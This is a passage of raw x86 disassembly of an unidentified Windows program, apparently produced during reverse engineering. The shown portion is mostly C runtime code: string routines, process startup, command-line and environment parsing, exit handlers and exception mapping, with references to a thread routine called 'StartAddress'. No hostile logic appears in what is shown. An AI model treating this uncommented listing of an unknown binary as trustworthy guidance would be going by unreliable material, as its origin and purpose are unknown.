loc_40267A: ; CODE XREF: sub_402600+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_402600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: StartAddress+103�p
; StartAddress+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402699: ; CODE XREF: sub_402680+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402699
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4026C1
mov edx, dword_406F3C
loc_4026C1: ; CODE XREF: sub_402680+39�j
; sub_402680+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4026E1
test al, al
jz short loc_4026E1
inc edx
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026E1: ; CODE XREF: sub_402680+58�j
; sub_402680+5C�j
mov ebx, edx
loc_4026E3: ; CODE XREF: sub_402680+81�j
mov al, [edx]
test al, al
jz short loc_402707
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_402703
inc edx
jmp short loc_4026E3
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402680+7E�j
and byte ptr [edx], 0
inc edx
loc_402707: ; CODE XREF: sub_402680+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_406F3C, edx
and eax, ebx
pop ebx
leave
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: StartAddress+E9�p
; StartAddress+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402791
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_401EF0+108�p
; sub_401EF0+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40274C
loc_40273D: ; CODE XREF: sub_402730+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40277F
test ecx, 3
jnz short loc_40273D
loc_40274C: ; CODE XREF: sub_402730+B�j
; sub_402730+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40274C
mov eax, [ecx-4]
test al, al
jz short loc_40278E
test ah, ah
jz short loc_402789
test eax, 0FF0000h
jz short loc_402784
test eax, 0FF000000h
jz short loc_40277F
jmp short loc_40274C
; ---------------------------------------------------------------------------
loc_40277F: ; CODE XREF: sub_402730+12�j
; sub_402730+4B�j
lea edi, [ecx-1]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_402730+44�j
lea edi, [ecx-2]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402789: ; CODE XREF: sub_402730+3D�j
lea edi, [ecx-3]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_40278E: ; CODE XREF: sub_402730+39�j
lea edi, [ecx-4]
loc_402791: ; CODE XREF: sub_402720+5�j
; sub_402730+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4027B6
loc_40279D: ; CODE XREF: sub_402730+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_402808
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40279D
jmp short loc_4027B6
; ---------------------------------------------------------------------------
loc_4027B1: ; CODE XREF: sub_402730+9E�j
; sub_402730+B8�j
mov [edi], edx
add edi, 4
loc_4027B6: ; CODE XREF: sub_402730+6B�j
; sub_402730+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4027B1
test dl, dl
jz short loc_402808
test dh, dh
jz short loc_4027FF
test edx, 0FF0000h
jz short loc_4027F2
test edx, 0FF000000h
jz short loc_4027EA
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027EA: ; CODE XREF: sub_402730+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027F2: ; CODE XREF: sub_402730+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027FF: ; CODE XREF: sub_402730+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402808: ; CODE XREF: sub_402730+72�j
; sub_402730+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402730 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402810(WORD CharType)
sub_402810 proc near ; CODE XREF: sub_401E30+19�p
CharType = word ptr 4
cmp dword_406CEC, 1
jle short loc_40282A
push 107h ; int
push dword ptr [esp+4+CharType] ; CharType
call sub_402A4C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40282A: ; CODE XREF: sub_402810+7�j
mov eax, dword ptr [esp+CharType]
mov ecx, off_406AE0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402810 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405128
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call GetVersion ; GetVersion
xor edx, edx
mov dl, ah
mov dword_406F64, edx
mov ecx, eax
and ecx, 0FFh
mov dword_406F60, ecx
shl ecx, 8
add ecx, edx
mov dword_406F5C, ecx
shr eax, 10h
mov dword_406F58, eax
xor esi, esi
push esi
call sub_403382
pop ecx
test eax, eax
jnz short loc_4028AA
push 1Ch
call sub_402959
; ---------------------------------------------------------------------------
db 59h ; Y
; ---------------------------------------------------------------------------
loc_4028AA: ; CODE XREF: .text:004028A0�j
mov [ebp-4], esi
call sub_4031D7
call GetCommandLineA ; GetCommandLineA
mov dword_407458, eax
call sub_4030A5
mov dword_406F40, eax
call sub_402E58
call sub_402D9F
call sub_402AC1
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call GetStartupInfoA ; GetStartupInfoA
call sub_402D47
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_4028F7
movzx eax, word ptr [ebp-2Ch]
jmp short loc_4028FA
; ---------------------------------------------------------------------------
loc_4028F7: ; CODE XREF: .text:004028EF�j
push 0Ah
pop eax
loc_4028FA: ; CODE XREF: .text:004028F5�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call GetModuleHandleA ; GetModuleHandleA
push eax
call sub_402029
mov [ebp-60h], eax
push eax
call sub_402AEE
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_402BC3
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402AFF
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402934(DWORD NumberOfBytesWritten)
sub_402934 proc near ; CODE XREF: sub_402D9F+4E�p
; sub_402D9F+7D�p ...
NumberOfBytesWritten= dword ptr 4
cmp dword_406F48, 1
jnz short loc_402942
call sub_403590
loc_402942: ; CODE XREF: sub_402934+7�j
push [esp+NumberOfBytesWritten] ; NumberOfBytesWritten
call sub_4035C9
push 0FFh ; uExitCode
call off_406AD0
pop ecx
pop ecx
retn
sub_402934 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; int __cdecl sub_402959(DWORD NumberOfBytesWritten)
sub_402959 proc near ; CODE XREF: .text:004028A4�p
NumberOfBytesWritten= dword ptr 4
cmp dword_406F48, 1
jnz short loc_402967
call sub_403590
loc_402967: ; CODE XREF: sub_402959+7�j
push [esp+NumberOfBytesWritten] ; NumberOfBytesWritten
call sub_4035C9
pop ecx
push 0FFh ; uExitCode
call ExitProcess ; ExitProcess
sub_402959 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402996
loc_402980: ; CODE XREF: sub_402996+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402996
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402996 proc near ; CODE XREF: sub_402600+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402980 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4029BB
loc_4029A8: ; CODE XREF: sub_402996+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402980
test cl, cl
jz short loc_402A04
test edx, 3
jnz short loc_4029A8
loc_4029BB: ; CODE XREF: sub_402996+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4029C6: ; CODE XREF: sub_402996+5B�j
; sub_402996+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402A08
and eax, 81010100h
jz short loc_4029C6
and eax, 1010100h
jnz short loc_402A02
and esi, 80000000h
jnz short loc_4029C6
loc_402A02: ; CODE XREF: sub_402996+62�j
; sub_402996+7B�j ...
pop esi
pop edi
loc_402A04: ; CODE XREF: sub_402996+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402A08: ; CODE XREF: sub_402996+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402A45
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A3E
test ah, ah
jz short loc_402A02
shr eax, 10h
cmp al, bl
jz short loc_402A37
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A30
test ah, ah
jz short loc_402A02
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_402996+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A37: ; CODE XREF: sub_402996+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A3E: ; CODE XREF: sub_402996+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A45: ; CODE XREF: sub_402996+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402996 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402A4C(WORD CharType, int)
sub_402A4C proc near ; CODE XREF: sub_402810+12�p
MultiByteStr = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
CharType = word ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+CharType]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402A6A
mov ecx, off_406AE0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402ABC
; ---------------------------------------------------------------------------
loc_402A6A: ; CODE XREF: sub_402A4C+10�j
mov ecx, eax
push esi
mov esi, off_406AE0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402A8F
and [ebp+var_2], 0
mov [ebp+MultiByteStr], cl
mov [ebp+var_3], al
push 2
jmp short loc_402A98
; ---------------------------------------------------------------------------
loc_402A8F: ; CODE XREF: sub_402A4C+33�j
and [ebp+var_3], 0
mov [ebp+MultiByteStr], al
push 1
loc_402A98: ; CODE XREF: sub_402A4C+41�j
pop eax
lea ecx, [ebp+0Ah]
push 1 ; int
push 0 ; Locale
push 0 ; CodePage
push ecx ; lpCharType
push eax ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 1 ; dwInfoType
call sub_40371C
add esp, 1Ch
test eax, eax
jnz short loc_402AB8
leave
retn
; ---------------------------------------------------------------------------
loc_402AB8: ; CODE XREF: sub_402A4C+68�j
movzx eax, word ptr [ebp+0Ah]
loc_402ABC: ; CODE XREF: sub_402A4C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402A4C endp
; =============== S U B R O U T I N E =======================================
sub_402AC1 proc near ; CODE XREF: .text:004028D1�p
mov eax, dword_407454
test eax, eax
jz short loc_402ACC
call eax ; dword_407454
loc_402ACC: ; CODE XREF: sub_402AC1+7�j
push offset dword_406010
push offset dword_406008
call sub_402BA9
push offset dword_406004
push offset dword_406000
call sub_402BA9
add esp, 10h
retn
sub_402AC1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402AEE(UINT uExitCode)
sub_402AEE proc near ; CODE XREF: .text:00402910�p
uExitCode = dword ptr 4
push 0 ; int
push 0 ; int
push [esp+8+uExitCode] ; uExitCode
call sub_402B10
add esp, 0Ch
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402AFF(UINT uExitCode)
sub_402AFF proc near ; CODE XREF: .text:0040292F�p
; sub_402934+1C�p
; DATA XREF: ...
uExitCode = dword ptr 4
push 0 ; int
push 1 ; int
push [esp+8+uExitCode] ; uExitCode
call sub_402B10
add esp, 0Ch
retn
sub_402AFF endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402B10(UINT uExitCode, int, int)
sub_402B10 proc near ; CODE XREF: sub_402AEE+8�p
; sub_402AFF+8�p
uExitCode = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_406F94, edi
jnz short loc_402B2D
push [esp+4+uExitCode] ; uExitCode
call GetCurrentProcess ; GetCurrentProcess
push eax ; hProcess
call TerminateProcess ; TerminateProcess
loc_402B2D: ; CODE XREF: sub_402B10+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_406F90, edi
mov byte_406F8C, bl
jnz short loc_402B81
mov eax, dword_407450
test eax, eax
jz short loc_402B70
mov ecx, dword_40744C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402B6F
loc_402B5C: ; CODE XREF: sub_402B10+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402B64
call eax
loc_402B64: ; CODE XREF: sub_402B10+50�j
sub esi, 4
cmp esi, dword_407450
jnb short loc_402B5C
loc_402B6F: ; CODE XREF: sub_402B10+4A�j
pop esi
loc_402B70: ; CODE XREF: sub_402B10+3C�j
push offset dword_406018
push offset dword_406014
call sub_402BA9
pop ecx
pop ecx
loc_402B81: ; CODE XREF: sub_402B10+33�j
push offset dword_406020
push offset dword_40601C
call sub_402BA9
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402BA7
push [esp+4+uExitCode] ; uExitCode
mov dword_406F94, edi
call ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_402BA7: ; CODE XREF: sub_402B10+85�j
pop edi
retn
sub_402B10 endp
; =============== S U B R O U T I N E =======================================
sub_402BA9 proc near ; CODE XREF: sub_402AC1+15�p
; sub_402AC1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402BAE: ; CODE XREF: sub_402BA9+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402BC1
mov eax, [esi]
test eax, eax
jz short loc_402BBC
call eax
loc_402BBC: ; CODE XREF: sub_402BA9+F�j
add esi, 4
jmp short loc_402BAE
; ---------------------------------------------------------------------------
loc_402BC1: ; CODE XREF: sub_402BA9+9�j
pop esi
retn
sub_402BA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402BC3(int, struct _EXCEPTION_POINTERS *ExceptionInfo)
sub_402BC3 proc near ; CODE XREF: .text:00402921�p
arg_0 = dword ptr 8
ExceptionInfo = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402D04
test eax, eax
pop ecx
jz loc_402CF8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402CF8
cmp ebx, 5
jnz short loc_402BF4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402D01
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402BC3+23�j
cmp ebx, 1
jz loc_402CF3
mov ecx, dword_406F98
mov [ebp+arg_0], ecx
mov ecx, [ebp+ExceptionInfo]
mov dword_406F98, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402CE3
mov ecx, dword_406D70
mov edx, dword_406D74
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402C43
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D00h[esi*4]
loc_402C3A: ; CODE XREF: sub_402BC3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402C3A
loc_402C43: ; CODE XREF: sub_402BC3+69�j
mov eax, [eax]
mov esi, dword_406D7C
cmp eax, 0C000008Eh
jnz short loc_402C5E
mov dword_406D7C, 83h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C5E: ; CODE XREF: sub_402BC3+8D�j
cmp eax, 0C0000090h
jnz short loc_402C71
mov dword_406D7C, 81h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C71: ; CODE XREF: sub_402BC3+A0�j
cmp eax, 0C0000091h
jnz short loc_402C84
mov dword_406D7C, 84h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C84: ; CODE XREF: sub_402BC3+B3�j
cmp eax, 0C0000093h
jnz short loc_402C97
mov dword_406D7C, 85h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C97: ; CODE XREF: sub_402BC3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402CAA
mov dword_406D7C, 82h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CAA: ; CODE XREF: sub_402BC3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402CBD
mov dword_406D7C, 86h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CBD: ; CODE XREF: sub_402BC3+EC�j
cmp eax, 0C0000092h
jnz short loc_402CCE
mov dword_406D7C, 8Ah
loc_402CCE: ; CODE XREF: sub_402BC3+99�j
; sub_402BC3+AC�j ...
push dword_406D7C
push 8
call ebx
pop ecx
mov dword_406D7C, esi
pop ecx
pop esi
jmp short loc_402CEB
; ---------------------------------------------------------------------------
loc_402CE3: ; CODE XREF: sub_402BC3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_402CEB: ; CODE XREF: sub_402BC3+11E�j
mov eax, [ebp+arg_0]
mov dword_406F98, eax
loc_402CF3: ; CODE XREF: sub_402BC3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402D01
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_402BC3+F�j
; sub_402BC3+1A�j
push [ebp+ExceptionInfo] ; ExceptionInfo
call UnhandledExceptionFilter ; UnhandledExceptionFilter
loc_402D01: ; CODE XREF: sub_402BC3+2C�j
; sub_402BC3+133�j
pop ebx
pop ebp
retn
sub_402BC3 endp
; =============== S U B R O U T I N E =======================================
sub_402D04 proc near ; CODE XREF: sub_402BC3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_406D78
cmp dword_406CF8, edx
push esi
mov eax, offset dword_406CF8
jz short loc_402D31
lea esi, [ecx+ecx*2]
lea esi, ds:406CF8h[esi*4]
loc_402D26: ; CODE XREF: sub_402D04+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402D31
cmp [eax], edx
jnz short loc_402D26
loc_402D31: ; CODE XREF: sub_402D04+16�j
; sub_402D04+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406CF8h[ecx*4]
cmp eax, ecx
jnb short loc_402D44
cmp [eax], edx
jz short locret_402D46
loc_402D44: ; CODE XREF: sub_402D04+3A�j
xor eax, eax
locret_402D46: ; CODE XREF: sub_402D04+3E�j
retn
sub_402D04 endp
; =============== S U B R O U T I N E =======================================
sub_402D47 proc near ; CODE XREF: .text:004028E3�p
cmp dword_407448, 0
jnz short loc_402D55
call sub_403C6B
loc_402D55: ; CODE XREF: sub_402D47+7�j
push esi
mov esi, dword_407458
mov al, [esi]
cmp al, 22h
jnz short loc_402D87
loc_402D62: ; CODE XREF: sub_402D47+33�j
; sub_402D47+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402D7F
test al, al
jz short loc_402D7F
movzx eax, al
push eax
call sub_403865
test eax, eax
pop ecx
jz short loc_402D62
inc esi
jmp short loc_402D62
; ---------------------------------------------------------------------------
loc_402D7F: ; CODE XREF: sub_402D47+21�j
; sub_402D47+25�j
cmp byte ptr [esi], 22h
jnz short loc_402D91
loc_402D84: ; CODE XREF: sub_402D47+52�j
inc esi
jmp short loc_402D91
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402D47+19�j
cmp al, 20h
jbe short loc_402D91
loc_402D8B: ; CODE XREF: sub_402D47+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402D8B
loc_402D91: ; CODE XREF: sub_402D47+3B�j
; sub_402D47+3E�j ...
mov al, [esi]
test al, al
jz short loc_402D9B
cmp al, 20h
jbe short loc_402D84
loc_402D9B: ; CODE XREF: sub_402D47+4E�j
mov eax, esi
pop esi
retn
sub_402D47 endp
; =============== S U B R O U T I N E =======================================
sub_402D9F proc near ; CODE XREF: .text:004028CC�p
push ebx
xor ebx, ebx
cmp dword_407448, ebx
push esi
push edi
jnz short loc_402DB1
call sub_403C6B
loc_402DB1: ; CODE XREF: sub_402D9F+B�j
mov esi, dword_406F40
xor edi, edi
loc_402DB9: ; CODE XREF: sub_402D9F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402DD1
cmp al, 3Dh
jz short loc_402DC4
inc edi
loc_402DC4: ; CODE XREF: sub_402D9F+22�j
push esi
call sub_402210
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402DB9
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: sub_402D9F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_406F74, esi
jnz short loc_402DF3
push 9 ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_402DF3: ; CODE XREF: sub_402D9F+4A�j
mov edi, dword_406F40
cmp [edi], bl
jz short loc_402E36
push ebp
loc_402DFE: ; CODE XREF: sub_402D9F+94�j
push edi
call sub_402210
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402E2F
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402E22
push 9 ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_402E22: ; CODE XREF: sub_402D9F+79�j
push edi
push dword ptr [esi]
call sub_402720
pop ecx
add esi, 4
pop ecx
loc_402E2F: ; CODE XREF: sub_402D9F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402DFE
pop ebp
loc_402E36: ; CODE XREF: sub_402D9F+5C�j
push dword_406F40
call sub_403C87
pop ecx
mov dword_406F40, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_407444, 1
pop ebx
retn
sub_402D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E58 proc near ; CODE XREF: .text:004028C7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_407448, ebx
push esi
push edi
jnz short loc_402E6F
call sub_403C6B
loc_402E6F: ; CODE XREF: sub_402E58+10�j
mov esi, offset Filename ; "C:\\Documents and Settings\\Vernier Image"...
push 104h ; nSize
push esi ; lpFilename
push ebx ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
mov eax, dword_407458
mov off_406F84, esi
mov edi, esi
cmp [eax], bl
jz short loc_402E94
mov edi, eax
loc_402E94: ; CODE XREF: sub_402E58+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402EF1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403CB6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402EC4
push 8 ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_402EC4: ; CODE XREF: sub_402E58+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402EF1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_406F6C, esi
pop edi
pop esi
mov dword_406F68, eax
pop ebx
leave
retn
sub_402E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF1 proc near ; CODE XREF: sub_402E58+47�p
; sub_402E58+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402F1B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402F1B: ; CODE XREF: sub_402EF1+20�j
cmp byte ptr [eax], 22h
jnz short loc_402F64
loc_402F20: ; CODE XREF: sub_402EF1+58�j
; sub_402EF1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402F52
test dl, dl
jz short loc_402F52
movzx edx, dl
test byte_407221[edx], 4
jz short loc_402F45
inc dword ptr [ecx]
test esi, esi
jz short loc_402F45
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402F45: ; CODE XREF: sub_402EF1+46�j
; sub_402EF1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F20
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402F20
; ---------------------------------------------------------------------------
loc_402F52: ; CODE XREF: sub_402EF1+36�j
; sub_402EF1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F5C
and byte ptr [esi], 0
inc esi
loc_402F5C: ; CODE XREF: sub_402EF1+65�j
cmp byte ptr [eax], 22h
jnz short loc_402FA7
inc eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F64: ; CODE XREF: sub_402EF1+2D�j
; sub_402EF1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F6F
mov dl, [eax]
mov [esi], dl
inc esi
loc_402F6F: ; CODE XREF: sub_402EF1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_407221[ebx], 4
jz short loc_402F8A
inc dword ptr [ecx]
test esi, esi
jz short loc_402F89
mov bl, [eax]
mov [esi], bl
inc esi
loc_402F89: ; CODE XREF: sub_402EF1+91�j
inc eax
loc_402F8A: ; CODE XREF: sub_402EF1+8B�j
cmp dl, 20h
jz short loc_402F98
test dl, dl
jz short loc_402F9C
cmp dl, 9
jnz short loc_402F64
loc_402F98: ; CODE XREF: sub_402EF1+9C�j
test dl, dl
jnz short loc_402F9F
loc_402F9C: ; CODE XREF: sub_402EF1+A0�j
dec eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F9F: ; CODE XREF: sub_402EF1+A9�j
test esi, esi
jz short loc_402FA7
and byte ptr [esi-1], 0
loc_402FA7: ; CODE XREF: sub_402EF1+6E�j
; sub_402EF1+71�j ...
and [ebp+arg_10], 0
loc_402FAB: ; CODE XREF: sub_402EF1+19E�j
cmp byte ptr [eax], 0
jz loc_403094
loc_402FB4: ; CODE XREF: sub_402EF1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_402FC0
cmp dl, 9
jnz short loc_402FC3
loc_402FC0: ; CODE XREF: sub_402EF1+C8�j
inc eax
jmp short loc_402FB4
; ---------------------------------------------------------------------------
loc_402FC3: ; CODE XREF: sub_402EF1+CD�j
cmp byte ptr [eax], 0
jz loc_403094
test edi, edi
jz short loc_402FD8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FD8: ; CODE XREF: sub_402EF1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_402FDD: ; CODE XREF: sub_402EF1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_402FE6: ; CODE XREF: sub_402EF1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_402FEF
inc eax
inc ebx
jmp short loc_402FE6
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402EF1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403020
test bl, 1
jnz short loc_40301E
xor edi, edi
